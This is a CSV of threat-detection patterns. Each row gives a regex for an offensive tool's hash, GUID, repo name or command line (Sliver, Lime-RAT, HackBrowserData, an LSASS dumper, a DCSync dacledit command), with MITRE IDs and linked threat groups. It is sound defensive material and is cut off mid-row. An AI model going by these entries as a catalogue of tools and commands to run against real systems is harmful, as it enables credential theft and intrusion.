"*dabaad1501e39a462ca3ec0e31f7dd0e70e335db0274b8fd03a03a2419037129*",".{0,1000}dabaad1501e39a462ca3ec0e31f7dd0e70e335db0274b8fd03a03a2419037129.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","40082"
"*dabac1fe57c2338d9eb6360fbb4627cdfbec3edd37bab8926333c0610b2499b7*",".{0,1000}dabac1fe57c2338d9eb6360fbb4627cdfbec3edd37bab8926333c0610b2499b7.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40083"
"*dac2f647397f3465db18352b2cc0286948f5d00e4467eac9176c0b4318aa8ff1*",".{0,1000}dac2f647397f3465db18352b2cc0286948f5d00e4467eac9176c0b4318aa8ff1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40084"
"*dac48d1f87a5d34496182771b76988929cc81463c576110b866165902f30b3bf*",".{0,1000}dac48d1f87a5d34496182771b76988929cc81463c576110b866165902f30b3bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40085"
"*dacledit.py -action write -rights DCSync -principal * -target-dn *",".{0,1000}dacledit\.py\s\-action\swrite\s\-rights\sDCSync\s\-principal\s.{0,1000}\s\-target\-dn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40087"
"*dad3df98ecb98bce9aee81b110ce6fca2ebba82fd56df1507b0a97688eb8d9bc*",".{0,1000}dad3df98ecb98bce9aee81b110ce6fca2ebba82fd56df1507b0a97688eb8d9bc.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","40088"
"*dadc9d874254d500356528ea6bfedbe9f8db453c4d64e2dfd7d68f97cd0f973d*",".{0,1000}dadc9d874254d500356528ea6bfedbe9f8db453c4d64e2dfd7d68f97cd0f973d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40089"
"*dadf9d853d94eb24a563cc2bba0c5539c8e92bf6340ac823f00af44b25a5a148*",".{0,1000}dadf9d853d94eb24a563cc2bba0c5539c8e92bf6340ac823f00af44b25a5a148.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40090"
"*dae0a69520b475e30675c010e3e563fb4b293032353f13ccd73000c697cdc93d*",".{0,1000}dae0a69520b475e30675c010e3e563fb4b293032353f13ccd73000c697cdc93d.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","40091"
"*DAE3997B-D51B-4D9F-9F11-2EBC6FDDF57C*",".{0,1000}DAE3997B\-D51B\-4D9F\-9F11\-2EBC6FDDF57C.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","40092"
"*dae7d1a42b0bb178bff2ca9729c31d59db045cd65db817cc9eca7a1721bc4c57*",".{0,1000}dae7d1a42b0bb178bff2ca9729c31d59db045cd65db817cc9eca7a1721bc4c57.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","#filehash","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","40094"
"*DAEDF7B3-8262-4892-ADC4-425DD5F85BCA*",".{0,1000}DAEDF7B3\-8262\-4892\-ADC4\-425DD5F85BCA.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#GUIDproject","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","40096"
"*daem0nc0re/PrivFu*",".{0,1000}daem0nc0re\/PrivFu.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","40097"
"*daem0nc0re/VectorKernel*",".{0,1000}daem0nc0re\/VectorKernel.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","40098"
"*daf3ed8ab5cb22d59e4b1de343f15e343c7e2383547f38f550b1e18a3cf8d11d*",".{0,1000}daf3ed8ab5cb22d59e4b1de343f15e343c7e2383547f38f550b1e18a3cf8d11d.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","#filehash","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","40100"
"*daf6f6b42fced73af9fb5339935a02d8bedc96719d35a2bc5153d931e310df3b*",".{0,1000}daf6f6b42fced73af9fb5339935a02d8bedc96719d35a2bc5153d931e310df3b.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","40101"
"*dafa76f08d48da880f27b5a3c65a9e88b45f1ec7a6790759595cf9c3745c1e48*",".{0,1000}dafa76f08d48da880f27b5a3c65a9e88b45f1ec7a6790759595cf9c3745c1e48.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40102"
"*DAFE686A-461B-402B-BBD7-2A2F4C87C773*",".{0,1000}DAFE686A\-461B\-402B\-BBD7\-2A2F4C87C773.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40103"
"*daff98d2dd945ec0f5d8ef476de48e57074416a50389639d01aa54444d2cfb44*",".{0,1000}daff98d2dd945ec0f5d8ef476de48e57074416a50389639d01aa54444d2cfb44.{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","0","#filehash","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","40104"
"*dafthack/DomainPasswordSpray*",".{0,1000}dafthack\/DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","40105"
"*dafthack/GraphRunner*",".{0,1000}dafthack\/GraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","40106"
"*dafthack/HostRecon*",".{0,1000}dafthack\/HostRecon.{0,1000}","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007  - ","N/A","N/A","Discovery","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","N/A","5","446","120","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z","40107"
"*dafthack/MailSniper*",".{0,1000}dafthack\/MailSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","40108"
"*dafthack/MFASweep*",".{0,1000}dafthack\/MFASweep.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003 - T1621","TA0006 - TA0009","N/A","N/A","Exploitation tool","https://github.com/dafthack/MFASweep","1","1","N/A","N/A","9","10","1484","203","2025-03-04T20:36:41Z","2020-09-22T16:25:03Z","40109"
"*dafthack/RDPSpray*",".{0,1000}dafthack\/RDPSpray.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","40110"
"*dahvid.schloss@echeloncyber.com*",".{0,1000}dahvid\.schloss\@echeloncyber\.com.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","#email","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","40111"
"*dahvidschloss/PILOT*",".{0,1000}dahvidschloss\/PILOT.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","40112"
"*DallasFR/Cobalt-Clip*",".{0,1000}DallasFR\/Cobalt\-Clip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","40113"
"*DallasFR/WinShellcode*",".{0,1000}DallasFR\/WinShellcode.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40114"
"*DAMP-master.zip",".{0,1000}DAMP\-master\.zip","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","40122"
"*DancingRightToLeft.py*",".{0,1000}DancingRightToLeft\.py.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","40123"
"*danielbohannon/Invoke-Obfuscation*",".{0,1000}danielbohannon\/Invoke\-Obfuscation.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","40124"
"*danielmiessler/SecLists*",".{0,1000}danielmiessler\/SecLists.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40125"
"*danielmiessler/SecLists.git*",".{0,1000}danielmiessler\/SecLists\.git.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40126"
"*danilovazb/BabyShark*",".{0,1000}danilovazb\/BabyShark.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","40127"
"*DanMcInerney/Empire*",".{0,1000}DanMcInerney\/Empire.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","40128"
"*DanMcInerney/icebreaker*",".{0,1000}DanMcInerney\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","40129"
"*DanMcInerney/net-creds*",".{0,1000}DanMcInerney\/net\-creds.{0,1000}","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","1","N/A","N/A","10","10","1746","442","2023-11-02T10:46:03Z","2015-01-07T18:47:46Z","40130"
"*DanMcInerney/theHarvester*",".{0,1000}DanMcInerney\/theHarvester.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","40131"
"*danti1988/adcshunter*",".{0,1000}danti1988\/adcshunter.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","40132"
"*daphne-main.zip*",".{0,1000}daphne\-main\.zip.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","N/A","8","1","17","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z","40133"
"*daphne-x64 * pid=*",".{0,1000}daphne\-x64\s.{0,1000}\spid\=.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","0","N/A","N/A","8","1","17","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z","40134"
"*dark24zz36xm4y2phwe7yvnkkkkhxionhfrwp67awpb3r3bdcneivoqd.onion*",".{0,1000}dark24zz36xm4y2phwe7yvnkkkkhxionhfrwp67awpb3r3bdcneivoqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40136"
"*darkarmour -f *.exe --encrypt xor --jmp --loop 7 -o *.exe*",".{0,1000}darkarmour\s\-f\s.{0,1000}\.exe\s\-\-encrypt\sxor\s\-\-jmp\s\-\-loop\s7\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40137"
"*darkarmour.py*",".{0,1000}darkarmour\.py.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","40138"
"*darkarmour-master*",".{0,1000}darkarmour\-master.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","40139"
"*DarkCoderSc/SharpShellPipe*",".{0,1000}DarkCoderSc\/SharpShellPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","40140"
"*darkhotel backdoor*",".{0,1000}darkhotel\sbackdoor.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40141"
"*DarkHotel C2*",".{0,1000}DarkHotel\sC2.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40142"
"*darkhotel data exfil server*",".{0,1000}darkhotel\sdata\sexfil\sserver.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40143"
"*darkhotel_headers*",".{0,1000}darkhotel_headers.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40144"
"*DarkLoadLibrary-maser*",".{0,1000}DarkLoadLibrary\-maser.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","N/A","10","10","1133","207","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z","40145"
"*darkr4y/geacon*",".{0,1000}darkr4y\/geacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 